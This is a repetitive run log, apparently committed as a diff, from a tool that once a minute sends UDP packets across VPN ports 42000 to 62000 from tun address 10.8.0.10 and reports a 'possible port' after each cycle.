48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:35:05 +Starting port fill at 2020-09-06 13:36:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:36:06 +Starting port fill at 2020-09-06 13:37:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:37:05 +Starting port fill at 2020-09-06 13:38:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:38:05 +Starting port fill at 2020-09-06 13:39:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:39:05 +Starting port fill at 2020-09-06 13:40:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:40:07 +Starting port fill at 2020-09-06 13:41:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:41:05 +Starting port fill at 2020-09-06 13:42:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:42:04 +Starting port fill at 2020-09-06 13:43:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:43:04 +Starting port fill at 2020-09-06 13:44:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:44:04 +Starting port fill at 2020-09-06 13:45:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 13:45:06 +Starting port fill at 2020-09-06 13:46:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:46:04 +Starting port fill at 2020-09-06 13:47:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 13:47:06 +Starting port fill at 2020-09-06 13:48:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:48:04 +Starting port fill at 2020-09-06 13:49:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:49:06 +Starting port fill at 2020-09-06 13:50:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:50:04 +Starting port fill at 2020-09-06 13:51:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:51:04 +Starting port fill at 2020-09-06 13:52:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:52:04 +Starting port fill at 2020-09-06 13:53:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:53:05 +Starting port fill at 2020-09-06 13:54:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 13:54:07 +Starting port fill at 2020-09-06 13:55:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:55:05 +Starting port fill at 2020-09-06 13:56:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:56:05 +Starting port fill at 2020-09-06 13:57:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:57:05 +Starting port fill at 2020-09-06 13:58:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 